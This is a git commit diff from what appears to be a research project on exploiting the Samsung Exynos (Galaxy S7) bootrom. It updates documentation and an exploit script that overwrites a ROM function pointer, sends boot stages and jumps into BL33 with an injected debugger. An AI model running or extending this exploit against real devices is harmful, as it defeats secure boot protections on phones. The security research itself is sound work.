Minor docs update and exploit.py update

This commit is contained in:
Jonathan Herrewijnen 2024-09-16 10:52:44 +02:00
parent d9d9ae332a
commit 201e8485e8
2 changed files with 24 additions and 2 deletions

View File

@ -154,8 +154,10 @@ We searched for quite some time for a space which was both writeable and executa
Python part
^^^^^^^^^^^
Python code to setup the debugger.
.. code-block:: python
# Setup initial debugger
self.setup_guppy_debugger()
self.cd.arch_dbg.state.auto_sync = False

View File

@ -774,8 +774,8 @@ class ExynosDevice():
# Restore bootflow
# self.cd.memwrite_region(0x020200dc, p32(hijacked_fun))
# Restore this to
self.cd.restore_stack_and_jump(hijacked_fun)
# Disable this to keep access to the debugger after senindg the next stage
# self.cd.restore_stack_and_jump(hijacked_fun)
# ==== Stage 5 ====
stage4 = open("../S7/g930f_latest/g930f_sboot.bin.4.bin", "rb").read()
@ -789,6 +789,26 @@ class ExynosDevice():
# assert len(stage4) == stage4_len, "Invalid stage4 length"
self.send_normal_stage(stage4)
# TRYOUT PATCHING BL33
# BL1 is loaded, now authenticate and patch it
auth_bl1(DEBUGGER_ADDR)
self.usb_write(b"FLSH") # Flush cache (Frederic does this..)
# Hijack ROM download function
hijacked_fun = u32(self.cd.memdump_region(0x020200dc, 4))
self.cd.memwrite_region(0x020200dc, p32(DEBUGGER_ADDR)) # hijack ROM_DOWNLOAD_USB for BL31
self.cd.memwrite_region(0x02021880, self.cd.arch_dbg.sc.branch_absolute(DEBUGGER_ADDR, branch_ins="br"))
# Jump into BL1 (sboot.bin.1.bin)
JUMP_BL33 = 0x8f000000
def jump_bl33(lr):
self.cd.arch_dbg.state.LR = lr
self.cd.restore_stack_and_jump(JUMP_BL33)
# And jump into BL1 to execute it
jump_bl33(DEBUGGER_ADDR)
time.sleep(2)
pass